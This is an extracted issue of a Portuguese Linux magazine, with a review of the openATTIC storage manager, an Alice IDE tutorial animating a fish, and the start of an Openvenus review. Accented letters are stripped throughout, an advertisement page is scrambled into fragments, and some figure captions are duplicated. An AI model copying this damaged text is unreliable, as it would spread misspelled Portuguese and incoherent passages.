dados de apenas alguns aplicativos e estende- se a todo o trfego de Internet. n

Mais informaes
[1] Onion Pi: http://learn.adafruit.com/onionpi
[2] Extenso 1Button App, da Amazon:
http://threatpost.com/amazon1buttonbrowseraddonleaksdatainplaintext
[3] Chaos Computer Club: http://en.wikipedia.
org/wiki/Chaos_Computer_Club
[4] Raspbian: http://www.raspberrypi.org/downloads
[5] Projeto netfilter/iptables:http://www.netfilter.org/projects/iptables/
[6] Are you using Tor? https://check.torproject.org

www.linuxmagazine.com.br

Redes

Armazenamento limpo
O openATTIC promete o gesto de armazenamento unificado
para meios heterogneos. A interface web facilita o servio e
suporta drives de rede acessados via SMB e NFS.
por Martin Loschwitz

e perguntarmos a cinco pessoas qual a definio de um


armazenamento unificado,
receberemos sete respostas contraditrias. Mais e mais fornecedores de solues de armazenamento
pr-configuradas aproveitaram
este problema e apresentaram
seus produtos como o verdadeiro
armazenamento unificado. Conhea o openATTIC [1], e agradea
a Deus por ele: o projeto promete
ser um sistema de gerenciamento
de armazenamento com protocolo
cruzado verdadeiramente unificado e com base em componentes
de cdigo aberto (figura 1).

A IT Novum [2] a fora motriz por trs do openATTIC. A


empresa anuncia seu produto
como um framework de gerenciamento de armazenamento
em cdigo aberto. E seu produto
prope generalizar e agregar o
gerenciamento de praticamente
qualquer tipo de armazenamento sob uma interface unificada
e fcil de usar [3]. O OpenATTIC
uma soluo relativamente
nova, mas a IT Novum possui
ideias bem definidas sobre como
desejam comercializ-lo. O core
a verso Community (a verso
descrita neste artigo), que con-

Figura 1 O openATTIC permite gerenciar unidades locais, volumes NFS, contas FTP e compartilhamentos Samba a partir de uma nica interface web.

tm a maior parte dos recursos e


est disponvel sob uma licena
livre. A verso Enterprise, que a
Novum tambm oferece, inclui
suporte adicional em vrios modelos at 24/7, mas a um preo:
o suporte padro sai por pouco
menos de 3.000 euros por ano; o
pacote XX-Large pode chegar
a 50.000 euros ou mais (quadro 1).
A interface web do OpenATTIC, um de seus componentes
mais importantes, permite que
os administradores gerenciem
o armazenamento, criem aes
para vrios servios e excluam
recursos. Ela tambm fornece
aos administradores a capacidade de lidar com todas as outras
tarefas que surgem no contexto
do espao de armazenamento,
tais como a criao de interfaces
de rede. Aplicativos externos
podem at mesmo gerenciar o
armazenamento diretamente,
graas API openATTIC.
Antes que possamos explorar
as maravilhas do openATTIC, no
entanto, temos que sobreviver
instalao, e a que as nuvens
negras comeam a se reunir. Uma
coisa logo se torna clara: o Ope-

Quadro 1: Benefcios comerciais

Alm do suporte, a verso comercial oferece recursos como o Snap Apps, que cria snapshots consistentes de
sistemas virtuais e bancos de dados (os snapshots na verso comunitria s permitem imagens em um disco ou
baseadas em sistemas ZFS). Sob a forma de SMI-S, o openATTIC Enterprise pretende fornecer, no futuro, uma
interface independente de fornecedor para gerenciamento de tarefas, mas, de acordo com a IT Novum, este recurso
ainda est em desenvolvimento. A oferta de suporte na variao Enterprise da IT Novum durante a instalao do
openATTIC certamente interessante.

66

www.linuxmagazine.com.br

Figura 2 Gerenciamento de dispositivos iSCSI no openATTIC.

nATTIC ainda no um produto


acabado para uso geral em sistemas Linux. Os desenvolvedores
esto atualmente programando
openATTIC para Debian Testing.
Para tornar o produto compatvel com o Debian GNU/Linux
6.0 (squeeze), eles fornecem um
script chamado Backport.sh, que faz
o backport de alguns pacotes da
distribuio do projeto de teste
do Debian para o squeeze.
Esta abordagem levanta preocupaes: difcil explicar por
que os desenvolvedores do openATTIC no oferecem pacotes
pr-compilados para as ferramentas necessrias sob a forma de
um repositrio APT, ao invs de
um script Shell bruto. Se estiver
preparado para assumir o trabalho do backporting ou instalar o
Debian wheezy, pelo menos poder colher os frutos dos pacotes
pr-compilados para openATTIC.
Mas estes pacotes no funcionam exatamente da maneira
esperada como pacotes Debian
tpicos: depois de instalar o pacote openattic, uma mensagem
debconf exibida pedindo para
executar o script Shell oacon
fig install aps a instalao. Os
administradores tambm precisam marcar os volumes lgicos
existentes que pertencem ao
sistema, e qual openATTIC deve
ficar sozinho, fora dos limites. E

Linux Magazine #108 | Fevereiro de 2014

os milhes de azarados que no


usam Debian, mas alguma outra
distribuio? As instrues de
instalao, alm das instrues
Debian j mencionadas, no parecem existir. Usar o openATTIC
em uma distribuio que no seja
Debian provavelmente exigir
coragem e nervos de ao.

Primeiros passos

Ao efetuar login na interface administrativa web, o openATTIC


apresenta uma verdadeira cornucpia de recursos. O layout
da guia de interface de usurio
clssica: esquerda, h uma lista
dos vrios mdulos; direita, o
contedo do mdulo selecionado
esquerda. Cada tipo de tarefa
est atribuda a seu prprio menu
no painel de controle: no topo esto as pginas que fornecem uma
viso geral do estado do sistema
openATTIC. Alm das mensagens
de log do sistema host e uma

viso aprimorada do grfico do


armazenamento utilizado e disponvel, o usurio ir se deparar
com muitos recursos teis. Por
exemplo, o ambiente vem com
uma implementao do Nagios
3, que monitora as estatsticas
vitais do cluster e aciona o alarme.
A configurao de monitoramento do Nagios totalmente
automatizada; os administradores no tm que lidar com a complexidade interna do Nagios. O
openATTIC completa este ponto
de vista, com tabelas e grficos
que revelam claramente a histria da rede e oferecem pistas
para encontrar problemas de
desempenho futuros.

Hardware de
armazenamento
O gerenciamento de dispositivos
de armazenamento fsico est localizado abaixo das estatsticas e
viso geral dos recursos. O openATTIC suporta muitos tipos de
dispositivos de armazenamento
fsico e permite fcil administrao usando a interface web. Logo
abaixo de Disks, encontraremos
uma lista de discos que so locais
para a mquina, incluindo os grupos de volume criados em LVM.
Alternativamente, podemos usar
este menu para gerenciar dispositivos de armazenamento SAN
que esto ligados ao host, por
exemplo, via iSCSI.

Figura 3 Gerenciamento de recursos NFS no openATTIC.

67

Gerenciamento
de volumes

A tela Volume Management (figura 2)


supervisiona os volumes de armazenamento e outros recursos: se
o usurio deseja que a mquina
openATTIC use um volume para
um propsito especfico, como
uma exportao NFS (figura 3) ou
um compartilhamento Samba,
precisa primeiro criar o volume.
No mesmo menu, ir encontrar
o recurso snapshot, que permite
criar snapshots de dispositivos de
armazenamento e volumes. Considerao importante: o OpenATTIC
tambm suporta ZFS. Se o usurio confiar no iSCSI em sua rede,
tambm pode usar a interface web
para criar iSCSI LUNs, que poder,
ento, integrar como discos locais
nos servidores de destino.
Em uma configurao de TI
madura, o acesso ao armazenamento desejvel no s em
nvel de bloco, mas tambm
atravs de vrios protocolos de
arquivos de rede, como NFS ou
Samba. Muitas vezes, estes protocolos e servios de arquivos de
rede so distribudos atravs de
vrios servidores na rede e no
so manipulveis centralmente.
Embora o openATTIC prometa
por um fim a este caos, ele consegue isso apenas em parte: o
ambiente realmente instala todos os componentes necessrios,
como NFS, FTP e servidor Samba,
e podemos gerenciar todas essas
ferramentas maravilhosamente
atravs do menu Shares na interface web. Um volume previamente criado, por exemplo, que
est disponvel como um disco
local, pode, assim, ser partilhado rapidamente atravs do NFS.
O mesmo se aplica aos compartilhamentos do Samba. Se o
administrador tiver operado os
passos adequados na interface

68

web, configurar um compartilhamento Samba para acesso por um


cliente Windows fcil. Tendo
em vista essas caractersticas, a
qualidade do openATTIC muito
impressionante; no laboratrio,
fomos capazes de criar e usar todos os volumes, como prometido.
Por outro lado, o openATTIC
deficiente em situaes onde a
configurao adicional complexa necessria; por exemplo,
a interface web ainda no tem
como suportar o Samba se comunicando com o LDAP.

Gerenciamento
de sistema e alta
disponibilidade
O fato de que o openATTIC no
serve somente para o gerenciamento do armazenamento
claramente evidenciado pelos
recursos adicionais disponveis
na interface web. Em essncia,
o openATTIC quase uma ferramenta para administrao geral
do sistema. Por exemplo, podemos editar as placas de interface
de rede do sistema atravs da
interface web. Em Online Update, o openATTIC fornece um gerenciador de atualizao grfica
que executa o aptitude ao fundo.
O openATTIC automaticamente
descobre que os pacotes so atualizveis de uma forma regular;
s precisamos acionar esta ao.
Os desenvolvedores tambm
consideraram um outro requisito essencial dos sistemas de
armazenamento: a alta disponibilidade (HA). No openATTIC,
podemos implementar a alta disponibilidade atravs do recurso
Peers: para uma configurao
HA completa, inicialmente precisamos construir dois sistemas
openATTIC, cada um com sua
prpria chave API. Na interface
web, abaixo de Peers, podemos

conectar as duas entidades. Se o


pacote openatticmoduledrbd instalado, podemos proceder para
configurar a replicao.
Se bem sucedido, o openATTIC com Distributed Replicated
Block Device (DRBD) garante
que as mquinas openATTIC
individuais sempre mantenham
seus dados em sincronia. A nica coisa desagradvel que o
conjunto obrigatrio de programas de alta disponibilidade,
compreendendo o Pacemaker e
o Corosync, no pode ser configurado atravs da interface
web em openATTIC, mas requer
o uso de software adicional,
como o Linux Cluster Management Console (LCMC) [4]. Dado
o fato de que a implementao
de uma interface grfica abrangente para Linux HA extremamente complicada, perdovel
que o openATTIC no oferea
o recurso na fase inicial. Seria
prefervel para o openATTIC
integrar automaticamente o
DRBD em um gerenciador de
cluster existente.

Concluso

O openATTIC promissor, mas,


em seu estado atual, ainda leva
os administradores a uma montanha russa de emoes. Por um
lado, o objetivo de fornecer um
front-end de gerenciamento para
vrias tecnologias de armazenamento para acabar com a selva
de armazenamento realmente
muito bem-sucedida. Aps a instalao, o ambiente um conjunto completo de gerenciamento
para qualquer tipo de armazenamento; o que reduz, assim, o
incmodo de se trabalhar com
muitos protocolos diferentes.
O fato de vrias instncias
openATTIC poderem se conectar
umas com as outras atravs da
API livre, e tambm poderem ser

www.linuxmagazine.com.br

incorporadas em uma soluo de


alta disponibilidade, impressionante. No entanto, a instalao
difcil, e um script Shell obscuro no inspira confiana; para
piorar a situao, o openATTIC
atualmente s funciona de forma confivel no Debian Wheezy.
Muito provavelmente, a escolha da distribuio em grande
parte devido s preferncias
pessoais dos desenvolvedores
openATTIC. De acordo com declaraes de Steffen Rieger, que
administra o desenvolvimento
do openATTIC na Novum IT, o
Wheezy realmente a distribuio recomendada. Mas a que
reside o problema: a posio
de mercado que o openATTIC
adota atualmente no muito
significativa. SUSE e Red Hat
possuem seus prprios dispositivos de armazenamento que
oferecem conjuntos de recursos

semelhantes aos do openATTIC.


Se o projeto quer competir com
essas solues, imperdovel no
possuir pacotes pr-compilados
para todas as distribuies corporativas. Mas, se o openATTIC
quer ser um dispositivo de armazenamento independente,
que pode ser instalado a partir
de um CD, a questo recai sobre

por que o projeto no fornece


uma imagem correspondente.
A soluo de armazenamento
openATTIC fantstica e oferece muitos benefcios. Mas,
a menos que acrescente uma
verso Enterprise, o projeto
permanecer oculto para muitos
tomadores de decises focados
em solues empresariais. n

Mais informaes

[1] openATTIC: http://www.openattic.org/en/home.html


[2] IT Novum: http://www.itnovum.com/en/home.html
[3] openATTIC documentation:
http://www.openattic.org/en/community/doku.html
[4] Console de Gerenciamento de Cluster Linux:
http://lcmc.sourceforge.net/

Gostou do artigo?
Queremos ouvir sua opinio. Fale conosco em:
cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/9112

NH O/
# 10 JU

ION p.10

3
AD MI N

Seguran
Redes &

MA GA ZIN
E
# 10

S EG U R A N

SEG URA NA
VIRTUA LIZ
VIRTUA LBO

p. 50

sempenho
OPENLAVA
de alto de
recursos
sistemas

OPE NLAVA

e
dor de
Compartilh
o gerencia
ste poderos
atravs de

T p. 68
HONEYPOques e vulnerabilidades

HON EYP OTM

ata
e
Identifique
HoneypotM
as com o
em sistem

2
EDIO: orma de compartilhamento p.3
r plataf
BM NESTA
VEJA TA.MNetgear: saiba qual a meitolhomais poderoso p.45

mu
Nexenta VS
comando:
em linha de
PowerShell

NEX ENTA
NETGEA R
POW ERS HEL
L

Linux Magazine #108 | Fevereiro de 2014

p. 57

ava
Segurana
rver 2008
s Vista/Se
do Window

FIR EWA LL

LNM.COM.BR/SHOPPING

ndo
est muda
O hardware
novas
ente com
constantem
ores e a
rad
ele
ac
,
CPUs
de ambos.
integrao
r quais
Como sabe
ais
res so ide
do
ssa
proce
cdigo?
para cada

p. 26
FIREWALL
rewall
nada no fi

ADQUIRA O SEU EXEMPLAR


EM NOSSA LOJA VIRTUAL

A
SEGURAN

ho em
desempen
o mximo
controlar
Como obter
gador para VirtualBox p.16
ples nave
sim
com
is
um
e
tua
Utiliz
quinas vir
per-V p.20
m
nte
3.0 do Hy
remotame
da verso
melhorias
Conhea as

A O

da tecnologia com segurana

20 13

ES.
ERABILIDAD NA
SUAS VULN
RA
COM SEGU
SIM COMO
IA
AS
E
OG
-S
OL
M
TECN
NIZA
OVEITO DA
AS MODER
OS SISTEM TIRAR O MXIMO PR
os p.13
O
virtualizad
SAIBA COM
ambientes

HYP ER-V

Saiba como tirar o mximo proveito

VIRTUA L

como suas vulnerabilidades.

ica
CEZAR TAUR
s tecnolg
quatro onda
Cloud nas

06 /2 01

Os sistemas modernizam-se assim

p.23

N
I
M
D
A
RANQUINHO

MARCELO B
mas
aos proble
Antecipe-se

exemplar

s
ix Solari
Linux Un
.BR
M
Windows
O
C
.
E
GAZIN
WWW.A

DMIN-

de

te

Assinan
ven da

pro ibid a

MA

69

Programao

Procurando Nemo

Assim como podemos usar nosso ambiente de desktop, tambm podemos escrever programas
para ele: tudo o que precisamos um mouse, o Alice IDE, e algum tempo de aprendizado.
por Tim Schrmann

as aes e processos necessrios


apenas usando o mouse. Comeamos arrastando itens prontos
para um mundo 3D. Cada item
oferece diversas aes que alteram sua aparncia, localizao,
ou comportamento. Depois, podemos simplesmente arrastar e
soltar as aes desejadas em um
plano sequencial, que o Alice
executa sob demanda.
Controles simples certamente tm seus limites. Por
exemplo, os aplicativos criados
aqui so sempre rooteados no
mundo 3D. O Alice , portanto,
adequado principalmente para
animaes 3D ou jogos. O requisito quase obrigatrio para o
mundo 3D que o Linux suporte
acelerao 3D da placa de vdeo;
caso contrrio, o programa que
o usurio criar ser executado
no ritmo de uma lesma.

Verses

o ambiente
de desenvolvimento
Alice, no precisamos
digitar um nico comando
ou aprender uma linguagem diferente. Em vez disso, podemos
criar aplicativos e compilar todas

O Alice [1] atualmente existe em


duas verses. De acordo com os
fabricantes, os iniciantes devem
usar a verso 2, mais antiga. Esta
verso ensina o raciocnio lgico
e os conceitos bsicos de programao. A nova verso 3, no
entanto, concentra-se na programao orientada a objetos e

tem usado de forma crescente a


terminologia padro encontrada
na rea, permitindo assim uma
transio posterior mais suave
para o Java.
A abordagem bsica a mesma em ambas as verses, sendo
a principal diferena a interface
de usurio e terminologia um
pouco diferentes. Neste artigo,
nos concentraremos na verso
3.1, mas a maioria das explicaes
tambm se aplicam ao Alice 2.3.
O ambiente de programao,
desenvolvido na Universidade
Carnegie Mellon, em Pittsburgh, Pensilvnia, EUA, no software livre. Apesar de o Alice ser
publicado sob uma licena livre,
no est disponvel em cdigo
aberto. A instalao do IDE
descrita no quadro 1.

Configurao

Depois de iniciar o ambiente de programao, ser exibida a janela mostrada na figura 1.


Primeiro precisamos selecionar o
plano de fundo para o mundo 3D.
No exemplo a seguir, queremos
um peixe nadando em um mundo
subaqutico, por isso escolhemos
SEA_FLOOR. Clicar em OK abrir a janela principal mostrada na figura 2.
Como a janela consome uma gran-

Quadro 1: Dica

Se quiser se livrar de uma ao a partir do editor de cdigo, basta arrast-la de volta para a lista na parte inferior esquerda.
Uma lixeira aparece, e basta soltar o o item sobre ela.

70

www.linuxmagazine.com.br

exibida a janela ilustrada na


figura 4, que mostra que criamos um novo objeto do tipo
ClownFish no mundo 3D. Para
reutilizar o objeto facilmente
mais tarde, crie um nome para
o peixe na caixa de nome (por
exemplo, Nemo) e pressione OK para fechar a janela.

Mecanismo
de elevao

Figura 1 Aps a inicializao, o Alice oferece diversos substratos para


o mundo 3D. Se no tiver certeza, escolha qualquer um deles; podemos substitu-lo mais tarde com um fundo colorido, por exemplo.

de quantidade de espao, o usurio


desejar que ela preencha toda a
tela. O painel superior esquerdo
a exibio da cena, o canto inferior
esquerdo o painel de mtodos, a
grande janela da direita o editor
de cdigo e a margem na parte inferior direita responde pelas tiles
de controle.
Por enquanto, analisaremos o
painel da cena, onde observaremos o mundo subaqutico 3D atualmente vazio. Pressione o boto
Setup scene para preench-lo com
um peixe, ou selecione Window/
Perspectives/Setup Scene a partir
do menu. O Alice agora muda para
a visualizao exibida na figura 3,
onde o mundo 3D ocupa a maior
parte da janela principal.
Na linha de fundo, a paleta contm todos os itens disponveis.
Para ajudar a manter o controle
dos objetos, o Alice classifica-os
em categorias. Flyer Classes, por
exemplo, so todos os objetos
que podem voar atualmente,
apenas pssaros. Pressionar All
Classes retorna para a viso geral. Um agrupamento alternativo
est disponvel na guia Browse

Linux Magazine #108 | Fevereiro de 2014

Gallery By Theme. Se olhar para


o oceano, por exemplo, todos os
objetos sero adequados para
um cenrio subaqutico. Finalmente, podemos clicar na guia
Search Gallery para buscar um
objeto especfico.
Para o cenrio subaqutico
desejado, altere para a guia Browse Gallery By Theme e selecione o tema Ocean. Em seguida,
mantenha pressionado o boto
esquerdo do mouse sobre o pequeno peixe-palhao amarelo e
arraste-o para o mundo subaqutico; contudo, no solte o boto
do mouse ainda. Um cubo amarelo
aparece no mundo (figura 3). Arraste o peixe-palhao at o local
onde deseja que ele permanea.
No exemplo, o transferimos
para o lado esquerdo da janela.
O usurio ir notar que o Alice
sempre localiza o objeto um
pouco acima do cho o que
no exatamente perfeito para
um peixe flutuante, mas no
algo que possamos mudar neste
momento. Depois de ter encontrado uma posio adequada,
solte o boto do mouse. Ser

O pequeno Nemo aparece agora


no mundo subaqutico. Um crculo verde indica que est selecionado (figura 5). Podemos arrastar
e soltar para mover o peixe por
a livremente; clicar em uma das
setas curvas na parte inferior
do mundo 3D permite alterar a
perspectiva. Para este exemplo,
no entanto, podemos ficar com
o ngulo de visualizao atual.
Na borda direita da janela, o
usurio encontrar uma paleta
com todas as propriedades do
objeto (no Alice 2, eles esto localizados na guia Properties, na
parte inferior esquerda). Podemos usar a lista drop-down Paint
para especificar uma cor diferente
para Nemo. O valor de opacidade define o quo transparente o
peixe ser. Um valor de 1.0 torna
Nemo completamente visvel, e
0,5 o torna semivisvel.

Figura 2 A janela principal do Alice que


aparece depois de selecionarmos o fundo
tem uma boa quantidade de espao por
conta dos muitos elementos.

71

Figura 3 Nesta visualizao, podemos


preencher o mundo 3D com os objetos.

Podemos usar o campo Vehicle para encadear Nemo a outro


objeto. Em seguida, ele passar
a seguir automaticamente cada
movimento do objeto escolhido. Particularmente interessantes so os valores para Position e Size do elemento Nemo.
Primeiro, devemos levantar o
peixe do cho um pouco, para
que ele possa nadar livremente. Para fazer isso, digite o valor 0,5 em y e pressione a tecla
[Enter]. O Alice agora levanta
o peixe (figura 5). Introduzir um
valor em x moveria Nemo para
um plano horizontal, e um valor z o moveria para frente ou
para trs. O tamanho padro de
Nemo perfeito para o exemplo.

atualmente rotulado como this.


Nemo. Essa ao permite modificar retroativamente o fundo. O
mundo 3D tambm um objeto
em si mesmo, com o nome this
pouco intuitivo. No entanto, isso
permite mudar a iluminao de
todo o ambiente ou envolv-lo
em um nevoeiro: na lista drop-down, clique uma vez sobre ele
e examine as propriedades. Os
nomes dos outros objetos comeam assim porque se encontram
no ambiente.
Se quiser que Nemo nade para
frente e para trs, precisar de
uma sequncia correspondente.
Pressione o boto Edit Code ou
selecione Window/Perspectives/

Edit Code para retornar visualizao anterior, onde se visualiza Nemo no canto superior
esquerdo. Logo abaixo, encontraremos uma lista de todas as
aes e truques que Nemo tem
na manga. Poderamos falar com
ele, por exemplo, ou mov-lo. Alice refere-se a todas essas aes
como procedimentos.

Girando a roda

Em seguida, desejamos que Nemo


nade toda a tela para a direita. No
momento, ele est olhando para
a frente, de modo que o primeiro
passo apont-lo para a direita.
Na lista, encontre o procedimento
para girar (na seo de orienta-

Figura 4 Nesta janela, digite um novo nome para o objeto recm-criado.


No exemplo, o peixe chamado de Nemo.

Perdidos
no espao
Assim como o peixe, mais alguns
objetos esto na cena: alm do
fundo, temos uma cmera atravs da qual podemos olhar diretamente para o oceano. No canto
superior esquerdo da janela, o
Alice lista todos os objetos, com
destaque para o objeto atualmente selecionado em amarelo.
A cmera e o solo tambm
tm propriedades que podem
ser modificadas. Para fazer isso,
clique sobre o nome do objeto
correspondente no canto superior esquerdo ou selecione-o na
borda direita do menu de seleo,

72

Figura 5 Nesta janela, digite um novo nome para o objeto recm-criado.


No exemplo, o peixe chamado de Nemo.

www.linuxmagazine.com.br

Figura 6 Se um procedimento requer um ajuste, basta selecion-lo a


partir de uma lista de especificaes.

o) e, em seguida, arraste esta


ao a um ponto da pgina ainda
vazio no lado direito aonde se l
drop statement here (no Alice
2: Do nothing).
Alice agora quer saber em qual
direo deve rotacionar Nemo.
Para o peixe olhar para a direita,
ele precisa rotacionar para a esquerda. Em outras palavras, digamos Left. Depois, preenchemos o
valor para rotacionar Nemo. Neste caso, o valor de 0,25 (figura 6),
que um quarto de rotao em

torno do prprio eixo de Nemo.


Para verificar, clique no boto
Run. Isso abrir uma nova janela
na qual Nemo olha para a direita (figura 7). Feche a janela novamente. Note que poderamos ter
rotacionado Nemo para a direita
na visualizao Scene clicando em
Rotation no canto superior direito e, em seguida, arrastando um
dos aros em torno de Nemo para
a direita com o mouse.
Em seguida, queremos que
Nemo nade para a direita. Po-

Figura 7 Nemo gira em seu mundo. Podemos pausar e reiniciar o fluxo


do programa usando os botes correspondentes na borda superior.

Linux Magazine #108 | Fevereiro de 2014

demos fazer isso com o processo Move. Arraste o recurso para


fora da lista no lado esquerdo
para a direita abaixo da ao
Turn. Se quiser que Nemo nade
para a frente, selecione Forward
a partir da lista. Um valor de 2,0
faria com que Nemo flutuasse no
meio da tela, enquanto que 10,0
o faria desaparecer de vista. Assim, preciso pressionar Custom
DecimalNumber, digitar um valor
de 3,5 na calculadora pop-up e,
em seguida, pressionar OK.
Agora, ao pressionar Run,
Nemo nada para a direita. No
entanto, a coisa toda ainda funciona de forma relativamente
rpida. Para mudar isso, clique
em Add detail na ao Move.
Para influenciar a durao da
natao, podemos selecionar
durao e depois 2.0. Isto ir retardar a animao pela metade.

Para todo
o sempre
No final das contas, Nemo precisa aprender a se virar. Para que
isso acontea, arraste a curva de
rotao para uma posio abaixo
das outras duas no editor. Nemo
precisa girar no sentido horrio
(direita) por um valor de 0,5. Ele,
ento, olha para a esquerda novamente. Com mais uma ao de
movimento, Nemo flutua direto
sua posio inicial (para frente)
com um valor de 3,5. Mais uma
vez, digite isso como um Custom
DecimalNumber. Para simplificar,
podemos manter o valor padro
para a velocidade.
Finalmente, Nemo deve olhar
para a frente novamente. Para
isso, arraste o processo Turn para
o editor mais uma vez e rotacione
Nemo por 0,25. O programa deve
aparecer agora como mostrado na
figura 8. Depois de iniciar o cdigo
pressionando Run, Nemo nada para

73

procedimentos at o loop. Dessa


maneira, Nemo nadar indefinidamente para frente e para trs.
Podemos verificar isso pressionando Run. Para interromper o
programa, basta fechar a janela.
Figura 8 Nesta janela, digite um novo nome
para o objeto recm-criado. No exemplo,
o peixe chamado de Nemo.

a direita, se vira, nada de volta, e


olha diretamente atrs do usurio.
Para comunicar ao Nemo que
deve nadar para a direita novamente, normalmente seria necessrio reiniciar o programa.
Felizmente, o Alice tambm pode
executar procedimentos em um
loop. Para fazer isso, feche a janela de pr-visualizao e siga at
os Control tiles no canto inferior
direito, onde Alice oculta alguns
movimentos especiais. No editor,
arraste para uma posio acima
de todos os procedimentos anteriores. O Alice indica isso com
uma linha verde, onde insere a
ao, se o usurio mover o cursor
com o boto do mouse.
A partir do menu drop-down,
selecione True (examinaremos
isso mais adiante). Mova todos
os procedimentos existentes
para uma posio entre while e
loop. O resultado deve ser como
o exibido na figura 9. Definimos
um loop infinito: enquanto o
valor true igual a true (ou seja,
sempre) Alice ir realizar todos os

Futuro

A condio de teste prxima ao


while obviamente trivial. Em vez
disso, podemos definir uma condio mais complexa para comunicar a Nemo que deve comear
a nadar somente se outro peixe
colidir com ele. As funes so
especialmente teis na elaborao de uma condio de teste;
os encontraremos em uma guia
no painel esquerdo. As funes
retornam valores como a localizao do Nemo, tamanho ou cor.
Quando passamos o mouse sobre uma das funes, Alice marca
locais no editor onde podemos
us-los. Assim como o Nemo,
os outros objetos no mundo 3D
tambm tm procedimentos e
funes. Alice enumera-os se clicarmos sobre eles na cena, ou se
os selecionarmos na lista drop-down de grandes dimenses abaixo
da pr-visualizao. Finalmente,
observe que Nemo composto
por vrias partes que podemos
mover ou manipular indepen-

dentemente uma da outra. Se


quiser que o peixe agite a cauda,
selecione this.Nemo na grande lista
drop-down, e depois passe para
o pequeno tringulo e selecione
this.Nemo.getTail. Todos os procedimentos e funes exibidos na
lista referem-se apenas cauda.
Desta forma, podemos animar a
cauda durante o mergulho.

Concluso

Programao no to difcil.
Com Alice, alguns cliques do
mouse so o suficiente para deixar um peixe nadar no mar. Esta
animao simples apenas arranha
a superfcie das possibilidades do
ambiente de desenvolvimento.
Se o usurio gostou de trabalhar
com Alice at agora, pode simplesmente experimentar outros
procedimentos e funes. Pode
aguardar por um fim de semana
chuvoso, ou de folga para a experimentao: o Alice viciante
e o tempo voa quando estamos
nos divertindo com ele.
Uma viso geral da interface
do usurio fornecida pela ajuda online [2], guias detalhados,
screencasts do Alice 3.1 curriculum resources [3], e vrios
livros que fazem referncia ao
Alice 2 [4]. n

Mais informaes
[1] Alice: http://www.alice.org
[2] Alice online help: http://help.alice.org/w/page/57584293/Getting%20
Started%20with%20Alice%203_1
[3] Alice 3.1 Curriculum Resources:
http://www.alice.org/index.php?page=3.1/download_materials
[4] Livros sobre Alice 2:
http://www.alice.org/index.php?page=documentation

Gostou do artigo?
Figura 9 O loop while permite que os peixes
nadem para frente e para trs em um padro
infinito e predeterminado de movimento.

74

Queremos ouvir sua opinio. Fale conosco em:


cartas@linuxmagazine.com.br
Este artigo no nosso site:
http://lnm.com.br/article/9103

www.linuxmagazine.com.br

Anlise

A face de Vnus

A plataforma Openvenus visa simplificar a vida do administrador; ela executa comandos contra
grupos de servidores e distribui arquivos ou softwares diretamente de uma localizao central.
por Konstantin Agouros

trabalho dirio de um administrador compreende


muitas tarefas, algumas
das quais muito tediosas: envolve
a instalao de patches, a criao
de novos servidores ou at mesmo
fazer alteraes em todos os computadores da empresa. A virtualizao e a computao em nuvem no
melhoram essa situao, pois a criao de um novo servidor virtual baseado em

Linux Magazine #108 | Fevereiro de 2014

uma imagem mestre feita rapidamente, e a inclinao , portanto,


faz-lo mais vezes do que o necessrio. No entanto, a manuteno
e o gerenciamento da atual coleo de imagens requer o mesmo
esforo que seria empregado em
um dispositivo dedicado.
Para agilizar as tarefas, os administradores tendem a escrever os
prprios conjuntos de ferramentas
ou personalizar solues existentes
para gerenciar sua lista de tarefas
de forma eficiente. O scVenus [1]
da Science+ Computing um desses softwares de gerenciamento
comercial. O desenvolvedor Albert Flgel ficou bastante impressionado pela scVenus quando foi
contratado como administrador
de sistemas em um ambiente de
grande porte. O cliente usou o
scVenus para gerenciar milhares
de usurios. Quando a licena
para o framework expirou, no entanto, a
equipe de administradores enfrentou
o problema de continuar a gerenciar
o que, em alguns
casos, eram verses
de sistemas operacionais antigos.
Mudar para uma
soluo mais verstil
como o Puppet no
funcionou porque isso
exigiria novo software. Essa e outras caractersticas ausentes
no scVenus levaram
Flgel a continuar

o desenvolvimento de uma implementao que havia iniciado


algum tempo antes: o Openvenus
[2]. O software modelado em
scVenus. Como a equipe de Flgel
j havia investido grande esforo
nos scripts scVenus, seu objetivo
era garantir a compatibilidade
com o scVenus em nvel de API.

O que o
sistema oferece
Administradores que instalarem
um servidor Openvenus (quadro 1),
possuem uma plataforma que facilita o gerenciamento centralizado
de sistema. O software no s controla as mquinas Linux (Red Hat,
Fedora, CentOS, SUSE), mas tambm Solaris ou HP-UX; possvel
at mesmo integrar os sistemas
Windows, se o ambiente Cygwin
estiver instalado.
Openvenus executa comandos simultaneamente em muitos
computadores. Para permitir que
isso acontea, os administradores
agrupam os dispositivos; um computador pode pertencer a vrios
grupos. Alm disso, o framework
distribui arquivos individuais ou
pacotes de software inteiros para
os sistemas gerenciados. Tecnicamente, o Openvenus compreende
um servidor mestre com os quais
os clientes a ser administrados so
conectados (figura 1). No servidor,
instalamos dois pacotes, Basic e
Server, embora os clientes s precisem do pacote bsico. Grandes
configuraes tambm podem
ser executadas em mais de um

75

Servidor Openvenus

Comandos , softwares e
configuraes com clientes

Cliente Openvenus

Cliente Openvenus

Cliente Openvenus

Figura 1 Estrutura de uma configurao Openvenus tpica.

servidor. A autenticao entre o


cliente e o servidor se baseia em
certificados SSL emitidos pelo
mestre no curso de cada instalao do cliente. Uma vez que a conexo foi estabelecida, o servidor
pode controlar remotamente os
clientes e transferir arquivos ou
pacotes de software para eles.

Muitos patres

O Openvenus projetado para vrios administradores, cada um deles


com uma conta prpria e com atribuies distintas de conjuntos de
tarefas. Para desencadear aes, o
administrador faz logon no n mestre. Para cada comando, podemos
configurar qual administrador (ou
grupo) precisa executar o comando
em qual host (ou em qual grupo).
Os direitos especiais tambm podem ser construdos; por exemplo,
John dado acesso administrativo
a todos os hosts no grupo Accounts,
exceto para o host Banking. As listas de administradores e grupos de

host so armazenadas localmente


na master ou em um servio de diretrio, como NIS ou LDAP; este
ltimo mais recomendado.

Marcao

Ao executar comandos, o Openvenus possui dois modos. Os administradores podem executar


comandos simples como um superusurio no cliente usando ovprdo,
enquanto ovrdo executa o comando
como um usurio normal. A sada
dos comandos aparece no console
onde foram iniciados e est escrita no log; o Openvenus tambm
avalia o cdigo de sada de cada
comando executado.
Se um host da lista inatingvel,
o Openvenus registra isso como
um erro, mas no coloca a tarefa
em fila. Podemos colocar comandos em fila para hosts inatingveis
usando a opo +N; a variante no
privilegiada no projetada para
operao em lote. A figura 2 mostra
um comando de fluxo de trabalho.

O segundo modo, uma variante


para operaes mais complexas,
so mtodos. O Openvenus possui
uma API separada para isso. Mtodos so implementados em Perl
ou scripts Bash. O administrador
